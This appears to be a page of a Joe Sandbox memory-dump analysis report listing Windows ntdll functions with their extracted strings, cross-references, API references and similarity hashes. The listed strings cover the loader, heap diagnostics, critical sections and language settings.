API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: c7dfddfae2a84609895c9792e88ebaf107566fabceeaa4c55a77bbc9c7bbb0e6
Instruction ID: f662d773ec9e2c29d90ff07e2a68a7c3bcb5e591a9aed6f012b19e8d9049ed32
Opcode Fuzzy Hash: c7dfddfae2a84609895c9792e88ebaf107566fabceeaa4c55a77bbc9c7bbb0e6
Instruction Fuzzy Hash: 3990023220348802D1147158840574A016547D0311F9DC452A4468658D8A9599957121

Non-executed Functions

Function 35562349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON

Download Yara Rule

Strings

RaiseExceptionOnPossibleDeadlock, xrefs: 35562579
UnloadEventTraceDepth, xrefs: 355624C0
DisableExceptionChainValidation, xrefs: 3556275F
LdrpInitializeExecutionOptions, xrefs: 3556317D
TracingFlags, xrefs: 35562549
@, xrefs: 35562B74
ExecuteOptions, xrefs: 355625A0
UseImpersonatedDeviceMap, xrefs: 3556251C
FrontEndHeapDebugOptions, xrefs: 35562489
MaxLoaderThreads, xrefs: 355624EC
CFGOptions, xrefs: 35562967
@, xrefs: 35562942
Initializing the application verifier package failed with status 0x%08lx, xrefs: 35563176
MaxDeadActivationContexts, xrefs: 35562D82
minkernel\ntdll\ldrinit.c, xrefs: 35563187
MinimumStackCommitInBytes, xrefs: 35562BB0
ShutdownFlags, xrefs: 355624A1
GlobalFlag2, xrefs: 35562FC0
GlobalFlag, xrefs: 35562F3F, 35563059
DisableHeapLookaside, xrefs: 3556246D

Memory Dump Source

Source File: 00000005.00000002.3335713924.00000000354B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354B0000, based on PE: true

Associated: 00000005.00000002.3335713924.00000000355D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.00000000355DD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.000000003564E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_354b0000_temp_file_rhjRS.jbxd

Similarity

API ID:
String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
API String ID: 0-2160512332
Opcode ID: 040610d7fca75d0a23fd0551562fca82a2102e4af1e514c1c8d6afba1480f566
Instruction ID: 0c395522cedb27d0872760c11a2d4df0606fdbe677676c68a708ba103ef7e5f0
Opcode Fuzzy Hash: 040610d7fca75d0a23fd0551562fca82a2102e4af1e514c1c8d6afba1480f566
Instruction Fuzzy Hash: 30928BB5608381AFE721CF24C880F5AB7E9BB84758F40592DFA95D7290DB74F844CB92

Function 355894E0 Relevance: 19.8, APIs: 8, Strings: 3, Instructions: 558
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlDebugPrintTimes.NTDLL ref: 35589688
RtlDebugPrintTimes.NTDLL ref: 35589727
RtlDebugPrintTimes.NTDLL ref: 35589807
RtlDebugPrintTimes.NTDLL ref: 355898E5
RtlDebugPrintTimes.NTDLL ref: 355899EA
RtlDebugPrintTimes.NTDLL ref: 35589A81
RtlDebugPrintTimes.NTDLL ref: 35589B94
RtlDebugPrintTimes.NTDLL ref: 35589CFC

Strings

, xrefs: 35589B84
, xrefs: 35589AD7
0, xrefs: 35589BF6

Memory Dump Source

Source File: 00000005.00000002.3335713924.00000000354B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354B0000, based on PE: true

Associated: 00000005.00000002.3335713924.00000000355D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.00000000355DD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.000000003564E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_354b0000_temp_file_rhjRS.jbxd

Similarity

API ID: DebugPrintTimes
String ID: $ $0
API String ID: 3446177414-3352262554
Opcode ID: 9d74c393ae239491ede74aaef82e29eafa5d12ee174b08ce769f9c5ef6b068ae
Instruction ID: f7e67a5d6ba56e0e7668e8585a460df97474c2483365620ab8f867607cad9858
Opcode Fuzzy Hash: 9d74c393ae239491ede74aaef82e29eafa5d12ee174b08ce769f9c5ef6b068ae
Instruction Fuzzy Hash: F532F2B5A083818FE350CF68C884B5BFBF5BB88344F44492EF59987250DBB5E949CB52

Function 35518620 Relevance: 17.7, Strings: 14, Instructions: 223
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Thread is in a state in which it cannot own a critical section, xrefs: 35555543
Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 3555540A, 35555496, 35555519
double initialized or corrupted critical section, xrefs: 35555508
Critical section address., xrefs: 35555502
Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 355554CE
Critical section debug info address, xrefs: 3555541F, 3555552E
First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 355554E2
Thread identifier, xrefs: 3555553A
8, xrefs: 355552E3
Invalid debug info address of this critical section, xrefs: 355554B6
Address of the debug info found in the active list., xrefs: 355554AE, 355554FA
Critical section address, xrefs: 35555425, 355554BC, 35555534
corrupted critical section, xrefs: 355554C2
undeleted critical section in freed memory, xrefs: 3555542B

Memory Dump Source

Source File: 00000005.00000002.3335713924.00000000354B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354B0000, based on PE: true

Associated: 00000005.00000002.3335713924.00000000355D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.00000000355DD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.000000003564E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_354b0000_temp_file_rhjRS.jbxd

Similarity

API ID:
String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
API String ID: 0-2368682639
Opcode ID: 82ecbc8ed9c36bb636d8b51f2e68bc5334c2b8b7068f669475581ee1f1499f9d
Instruction ID: d4866e461d0371fb6b5cd5b834495b585d73ccb8bf14cbb87f447a197ada33dd
Opcode Fuzzy Hash: 82ecbc8ed9c36bb636d8b51f2e68bc5334c2b8b7068f669475581ee1f1499f9d
Instruction Fuzzy Hash: 6F819AB5A00358FFEB24CF94C844BAEBBB5BB48320F51459AF909B7240D775B941CBA0

Function 35590274 Relevance: 16.1, APIs: 1, Strings: 8, Instructions: 348
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlDebugPrintTimes.NTDLL ref: 355902A8

Strings

HEAP: , xrefs: 355903A6, 355904B5, 355905DD, 35590682, 355906D9
HEAP[%wZ]: , xrefs: 35590399, 355904A8, 355905D0, 35590675, 355906CC
RtlReAllocateHeap, xrefs: 355902BF, 35590362
Just reallocated block at %p to 0x%Ix bytes with tag %ws, xrefs: 3559069F
Invalid allocation size - %Ix (exceeded %Ix), xrefs: 355906EA
About to reallocate block at %p to %Ix bytes, xrefs: 355903BA
About to rellocate block at %p to 0x%Ix bytes with tag %ws, xrefs: 355904D3
Just reallocated block at %p to %Ix bytes, xrefs: 355905F1

Memory Dump Source

Source File: 00000005.00000002.3335713924.00000000354B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354B0000, based on PE: true

Associated: 00000005.00000002.3335713924.00000000355D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.00000000355DD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.000000003564E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_354b0000_temp_file_rhjRS.jbxd

Similarity

API ID: DebugPrintTimes
String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
API String ID: 3446177414-1700792311
Opcode ID: 8f23c20b21f73a526c5dcd65ac81276ff11563f419d903fd6bd6c4b597623451
Instruction ID: edacd9b24dcb93ba228828551498f509837f7d6e4689c77fa4f7169aea58c461
Opcode Fuzzy Hash: 8f23c20b21f73a526c5dcd65ac81276ff11563f419d903fd6bd6c4b597623451
Instruction Fuzzy Hash: B7D1CC76A04285DFDB09CF68C450AE9FBF1FF49310F458899E849DB262DB78A981CF50

Function 35510F30 Relevance: 13.3, Strings: 10, Instructions: 764COMMON

Download Yara Rule

Strings

, xrefs: 35510FEC
!, xrefs: 35510FA6
w, xrefs: 35510FBA
l, xrefs: 35510FC4
%%%u, xrefs: 355514CC
9, xrefs: 35510F9C
%, xrefs: 35510F7E
h, xrefs: 35510FB0
%%%u!%s!, xrefs: 355514A1
0, xrefs: 35510F92

Memory Dump Source

Source File: 00000005.00000002.3335713924.00000000354B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354B0000, based on PE: true

Associated: 00000005.00000002.3335713924.00000000355D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.00000000355DD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.000000003564E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_354b0000_temp_file_rhjRS.jbxd

Similarity

API ID:
String ID: $!$%$%%%u$%%%u!%s!$0$9$h$l$w
API String ID: 0-360209818
Opcode ID: 836c140191e3ad3f855feb084029978690452d648c55fca78c843d13d6dbe0bf
Instruction ID: b2148341e805b38b78c2122227eac4f819b7076ec92f429d412bb483e64b9785
Opcode Fuzzy Hash: 836c140191e3ad3f855feb084029978690452d648c55fca78c843d13d6dbe0bf
Instruction Fuzzy Hash: 736294B5E042A58FEB24CF14CC50799BBB6BF95320F5145DAD88AAB240DB726ED1CF40

Function 354DD34C Relevance: 12.8, Strings: 10, Instructions: 312COMMON

Download Yara Rule

Strings

H/P5, xrefs: 354DD5CA
MachinePreferredUILanguages, xrefs: 354DD685
\Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 354DD3B6
Control Panel\Desktop, xrefs: 354DD45D
@, xrefs: 354DD663
@, xrefs: 354DD49D
PreferredUILanguages, xrefs: 354DD4B8, 354DD4C5
@, xrefs: 354DD3E9
Control Panel\Desktop\MuiCached, xrefs: 354DD62B
PreferredUILanguagesPending, xrefs: 3553A8DE

Memory Dump Source

Source File: 00000005.00000002.3335713924.00000000354B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354B0000, based on PE: true

Associated: 00000005.00000002.3335713924.00000000355D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.00000000355DD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.000000003564E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_354b0000_temp_file_rhjRS.jbxd

Similarity

API ID:
String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$H/P5$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings
API String ID: 0-2354469387
Opcode ID: bdb9452a01356edebe59d50b3f4ce234b7406f39672e5c7f3af73ad2ee8bd3c9
Instruction ID: cf55464c821b4931069078006f5ada7f76620e5758ab3789d907d30304f3ea45
Opcode Fuzzy Hash: bdb9452a01356edebe59d50b3f4ce234b7406f39672e5c7f3af73ad2ee8bd3c9
Instruction Fuzzy Hash: 00B189B6909351DFD719CE24C4A0B5BF7E8BB88784F42496EF888D7241D770E909CB92

Function 3558F525 Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 231timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 3558F556

Strings

HEAP: , xrefs: 3558F6F4, 3558F7A1, 3558F7F8
HEAP[%wZ]: , xrefs: 3558F6E7, 3558F794, 3558F7EB
Invalid allocation size - %Ix (exceeded %Ix), xrefs: 3558F809
Just allocated block at %p for %Ix bytes, xrefs: 3558F708
Just allocated block at %p for 0x%Ix bytes with tag %ws, xrefs: 3558F7BE
RtlAllocateHeap, xrefs: 3558F56D

Memory Dump Source

Source File: 00000005.00000002.3335713924.00000000354B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354B0000, based on PE: true

Associated: 00000005.00000002.3335713924.00000000355D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.00000000355DD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.000000003564E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_354b0000_temp_file_rhjRS.jbxd

Similarity

API ID: DebugPrintTimes
String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
API String ID: 3446177414-1745908468
Opcode ID: 138a688ab43e0e05b2833f7a07354cba0dae2763addf77428a03f597d3b5322c
Instruction ID: af796128a42a22809b41c0fba1c0812f8fb8439f6fefa436cadac11a5f6db8b8
Opcode Fuzzy Hash: 138a688ab43e0e05b2833f7a07354cba0dae2763addf77428a03f597d3b5322c
Instruction Fuzzy Hash: 3691CA36A00681DFEB09CFA8C450A9DFBF2BF49310F54849EE445EB262DB75A981CF50

Function 355912ED Relevance: 11.8, Strings: 9, Instructions: 515COMMON

Download Yara Rule

Strings

Heap block at %p has incorrect segment offset (%x), xrefs: 3559181A
HEAP: , xrefs: 35591706, 35591756, 355917A8, 35591809, 3559184D, 35591895, 355918E6
HEAP[%wZ]: , xrefs: 355916CD, 355916F9, 35591749, 3559179B, 355917FC, 35591840, 355918D9
Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x), xrefs: 355918F8
Heap block at %p is not last block in segment (%p), xrefs: 355917B7
Free Heap block %p modified at %p after it was freed, xrefs: 3559171B
Heap entry %p has incorrect PreviousSize field (%04x instead of %04x), xrefs: 3559186B
Heap block at %p has corrupted PreviousSize (%lx), xrefs: 3559176D
Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x), xrefs: 355918A5

Memory Dump Source

Source File: 00000005.00000002.3335713924.00000000354B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354B0000, based on PE: true

Associated: 00000005.00000002.3335713924.00000000355D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.00000000355DD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.000000003564E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_354b0000_temp_file_rhjRS.jbxd

Similarity

API ID:
String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
API String ID: 0-3591852110
Opcode ID: fe8182d6c77e307ffb37a65bb503d620194ff60db1644d87b0e94d4407ecfa82
Instruction ID: 8ec5354bcfb5561d44383386f78cf6d7f89110f549552de20f89e5bebcffad8d
Opcode Fuzzy Hash: fe8182d6c77e307ffb37a65bb503d620194ff60db1644d87b0e94d4407ecfa82
Instruction Fuzzy Hash: 0B128C746046929FDB1DCF24C450BEABBF1FF09354F558899E4868B642E778F881CB90

Function 354FAD00 Relevance: 11.8, Strings: 9, Instructions: 509COMMON

Download Yara Rule

Strings

DLL name: %wZ, xrefs: 35548075
minkernel\ntdll\ldrfind.c, xrefs: 355482E1
LdrpInitializeDllPath, xrefs: 355480AD
LdrpFindLoadedDllInternal, xrefs: 355482D7
DLL search path passed in externally: %ws, xrefs: 355480A6
Status: 0x%08lx, xrefs: 355482D0, 355483AB
minkernel\ntdll\ldrapi.c, xrefs: 35548086, 355483BC
minkernel\ntdll\ldrutil.c, xrefs: 355480B7
LdrGetDllHandleEx, xrefs: 3554807C, 355483B2

Memory Dump Source

Source File: 00000005.00000002.3335713924.00000000354B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354B0000, based on PE: true

Associated: 00000005.00000002.3335713924.00000000355D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.00000000355DD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.000000003564E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_354b0000_temp_file_rhjRS.jbxd

Similarity

API ID:
String ID: DLL name: %wZ$DLL search path passed in externally: %ws$LdrGetDllHandleEx$LdrpFindLoadedDllInternal$LdrpInitializeDllPath$Status: 0x%08lx$minkernel\ntdll\ldrapi.c$minkernel\ntdll\ldrfind.c$minkernel\ntdll\ldrutil.c
API String ID: 0-3197712848
Opcode ID: ffc00e65caa741a9c718a6b1844d4a8f4c929cdfe58addb727c84e8d30855a02
Instruction ID: f5cb2b0eec8f7bfb945f02ab9c7d95f185f291f1cdfe92fb718bf45afb7745e5
Opcode Fuzzy Hash: ffc00e65caa741a9c718a6b1844d4a8f4c929cdfe58addb727c84e8d30855a02
Instruction Fuzzy Hash: FE1205B5A083419FE318CF18C840BAAB7E1FF85B54F44455EF8859B390EB71E945CB92

Function 354DD08D Relevance: 11.5, Strings: 9, Instructions: 249COMMON

Download Yara Rule

Strings

@, xrefs: 354DD0FD
@, xrefs: 354DD2AF
\Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 354DD0CF
Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 354DD146
Control Panel\Desktop\LanguageConfiguration, xrefs: 354DD196
@, xrefs: 354DD313
H/P5, xrefs: 3553A843
\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 354DD2C3
Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 354DD262

Memory Dump Source

Source File: 00000005.00000002.3335713924.00000000354B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354B0000, based on PE: true

Associated: 00000005.00000002.3335713924.00000000355D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.00000000355DD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.000000003564E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_354b0000_temp_file_rhjRS.jbxd

Similarity

API ID:
String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$H/P5$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration
API String ID: 0-6669980
Opcode ID: 02d2c528bbb38ea4e2ae4f2fb1b4e8fe8898467b992374d874d6cd6ff38477b1
Instruction ID: 153de15dcd28a464af5edf74d833c00b405b0e9524ba3d5ddd46363f5c30e0e2
Opcode Fuzzy Hash: 02d2c528bbb38ea4e2ae4f2fb1b4e8fe8898467b992374d874d6cd6ff38477b1
Instruction Fuzzy Hash: 00A168B2908345DFE715CF20C490B9BFBE8BB84765F41492EE98896241E774E908CF92

Function 354F1070 Relevance: 11.4, APIs: 2, Strings: 4, Instructions: 940timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 35545672

Strings

HEAP: , xrefs: 35545884
HEAP[%wZ]: , xrefs: 35545877
@, xrefs: 35545A53
!(CheckedFlags & ~HEAP_CREATE_VALID_MASK), xrefs: 3554588F

Memory Dump Source

Source File: 00000005.00000002.3335713924.00000000354B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354B0000, based on PE: true

Associated: 00000005.00000002.3335713924.00000000355D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.00000000355DD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.000000003564E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_354b0000_temp_file_rhjRS.jbxd

Similarity

API ID: DebugPrintTimes
String ID: !(CheckedFlags & ~HEAP_CREATE_VALID_MASK)$@$HEAP: $HEAP[%wZ]:
API String ID: 3446177414-3570731704
Opcode ID: 94aa42d7851d01d55a71a74bf7efa3acba373809b66204b8f59f2eddfa42130b
Instruction ID: b859f9543a37db9d9a5c908a41d01c26f8bc2ea8f90df65ad158375410540433
Opcode Fuzzy Hash: 94aa42d7851d01d55a71a74bf7efa3acba373809b66204b8f59f2eddfa42130b
Instruction Fuzzy Hash: 1B923775A05368CFEB28CF18C840F99B7B6BF45350F1581EAE849A7290DB71AE81CF51

Function 3550D7B0 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 151timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 3550D959

Part of subcall function 354E4859: RtlDebugPrintTimes.NTDLL ref: 354E48F7

Strings

$, xrefs: 3550D86D
minkernel\ntdll\ldrinit.c, xrefs: 3554F2D8
LdrShutdownProcess, xrefs: 3554F2CE
Process 0x%p (%wZ) exiting, xrefs: 3554F2C7
$, xrefs: 3550D900

Memory Dump Source

Source File: 00000005.00000002.3335713924.00000000354B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354B0000, based on PE: true

Associated: 00000005.00000002.3335713924.00000000355D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.00000000355DD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.000000003564E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_354b0000_temp_file_rhjRS.jbxd

Similarity

API ID: DebugPrintTimes
String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
API String ID: 3446177414-1975516107
Opcode ID: 5786fdab9046d262faef10f13f6e9680045c1c7d8c261d4a0d8e99d4be1e5dff
Instruction ID: b2ac0f758cbb90728c474d8fcc0cd5b3b1d79d3bac82af338881adab094b7bbe
Opcode Fuzzy Hash: 5786fdab9046d262faef10f13f6e9680045c1c7d8c261d4a0d8e99d4be1e5dff
Instruction Fuzzy Hash: 1651CEB6E043459FEB04CFA8C88479DBBF1BF48324F56455AD8016B281DBB1B942CF90

Function 354EADE0 Relevance: 10.6, Strings: 8, Instructions: 573COMMON

Download Yara Rule

Strings

J, xrefs: 354EAEAE
\UK5, xrefs: 354EADF7
#, xrefs: 3554363D
LdrpResSearchResourceMappedFile Enter, xrefs: 354EAEB8
MUI, xrefs: 354EB410
\UK5, xrefs: 354EAE39
H, xrefs: 354EAEC2
LdrpResSearchResourceMappedFile Exit, xrefs: 354EAECC

Memory Dump Source

Source File: 00000005.00000002.3335713924.00000000354B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354B0000, based on PE: true

Associated: 00000005.00000002.3335713924.00000000355D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.00000000355DD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.000000003564E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_354b0000_temp_file_rhjRS.jbxd

Similarity

API ID:
String ID: #$H$J$LdrpResSearchResourceMappedFile Enter$LdrpResSearchResourceMappedFile Exit$MUI$\UK5$\UK5
API String ID: 0-2004659343
Opcode ID: 0b60dae66b9ad64a86aedf6b3de0073a5f4ca83bb7009ee63ed487dc27bca4f4
Instruction ID: e873daaa1a0e5b745d63e0a5e0ff0e2d68be265df3aa97bffc2e97055975fe64
Opcode Fuzzy Hash: 0b60dae66b9ad64a86aedf6b3de0073a5f4ca83bb7009ee63ed487dc27bca4f4
Instruction Fuzzy Hash: 1532AEB5A053698BEB2ACB14CC98BDEB7B5BF45381F5041E9E848A7350DB719EC18F40

Function 35590CB5 Relevance: 10.4, Strings: 8, Instructions: 402COMMON

Download Yara Rule

Strings

dedicated (%04Ix) free list element %p is marked busy, xrefs: 35590ED1
HEAP: , xrefs: 35590E61, 35590EC2, 35590FD5, 3559105E, 35591124, 35591178
Pseudo Tag %04x size incorrect (%Ix != %Ix) %p, xrefs: 3559113D
Number of free blocks in arena (%ld) does not match number in the free lists (%ld), xrefs: 35590FE4
HEAP[%wZ]: , xrefs: 35590E54, 35590EB5, 35590FC8, 35591051, 35591117, 3559116B
Total size of free blocks in arena (%Id) does not match number total in heap header (%Id), xrefs: 3559106F
Non-Dedicated free list element %p is out of order, xrefs: 35590E6D
Tag %04x (%ws) size incorrect (%Ix != %Ix) %p, xrefs: 35591192

Memory Dump Source

Source File: 00000005.00000002.3335713924.00000000354B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354B0000, based on PE: true

Associated: 00000005.00000002.3335713924.00000000355D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.00000000355DD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.000000003564E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_354b0000_temp_file_rhjRS.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $Non-Dedicated free list element %p is out of order$Number of free blocks in arena (%ld) does not match number in the free lists (%ld)$Pseudo Tag %04x size incorrect (%Ix != %Ix) %p$Tag %04x (%ws) size incorrect (%Ix != %Ix) %p$Total size of free blocks in arena (%Id) does not match number total in heap header (%Id)$dedicated (%04Ix) free list element %p is marked busy
API String ID: 0-1357697941
Opcode ID: a74259729a054d01bb6080442e20a840909b2059dfaa4d1a5c3b7fee886eca8d
Instruction ID: 31f163563fda3c13ccb7efc3cd33e008f1e49247ecbf3b35a217518affb069ec
Opcode Fuzzy Hash: a74259729a054d01bb6080442e20a840909b2059dfaa4d1a5c3b7fee886eca8d
Instruction Fuzzy Hash: 5FF1DC76A04295EFDB19CF68C450BEAF7F5FF09300F448899E4869B252D738BA45CB90

Function 35579179 Relevance: 10.4, Strings: 8, Instructions: 401COMMON

Download Yara Rule

Strings

\Sessions, xrefs: 35579488
AppContainerNamedObjects, xrefs: 3557946E, 355794D6
%s\%ld\%s, xrefs: 3557948D
%s\%u-%u-%u-%u, xrefs: 35579422
\AppContainerNamedObjects, xrefs: 355794AB, 355794B9
Global\Session\%ld%s, xrefs: 355794C5
BaseNamedObjects, xrefs: 35579477, 3557947C
\BaseNamedObjects, xrefs: 3557949E

Memory Dump Source

Source File: 00000005.00000002.3335713924.00000000354B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354B0000, based on PE: true

Associated: 00000005.00000002.3335713924.00000000355D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.00000000355DD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.000000003564E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_354b0000_temp_file_rhjRS.jbxd

Similarity

API ID:
String ID: %s\%ld\%s$%s\%u-%u-%u-%u$AppContainerNamedObjects$BaseNamedObjects$Global\Session\%ld%s$\AppContainerNamedObjects$\BaseNamedObjects$\Sessions
API String ID: 0-3063724069
Opcode ID: d9202ef94801223014512f9456519dc4eaa769e99b4b8a5e63677581db5f2eb8
Instruction ID: 2397226080cedcde1e91e543558a81cd09cf7a82a27ac6de00d25a51c52ddbea
Opcode Fuzzy Hash: d9202ef94801223014512f9456519dc4eaa769e99b4b8a5e63677581db5f2eb8
Instruction Fuzzy Hash: 86D1D3B2908355AFD721CA54C880F6BB7F8BFC4754F814A2DF984A7150E770E9488BE6

Function 354F9EB0 Relevance: 9.2, Strings: 7, Instructions: 499COMMON

Download Yara Rule

Strings

@, xrefs: 354F9EE7
!(askd.Flags & ACTIVATION_CONTEXT_SECTION_KEYED_DATA_FLAG_FOUND_IN_SYSTEM_DEFAULT), xrefs: 35547709
minkernel\ntdll\sxsisol.cpp, xrefs: 35547713, 355478A4
Internal error check failed, xrefs: 35547718, 355478A9
sxsisol_SearchActCtxForDllName, xrefs: 355476DD
Status != STATUS_NOT_FOUND, xrefs: 3554789A
[%x.%x] SXS: %s - Relative redirection plus env var expansion., xrefs: 355476EE

Memory Dump Source

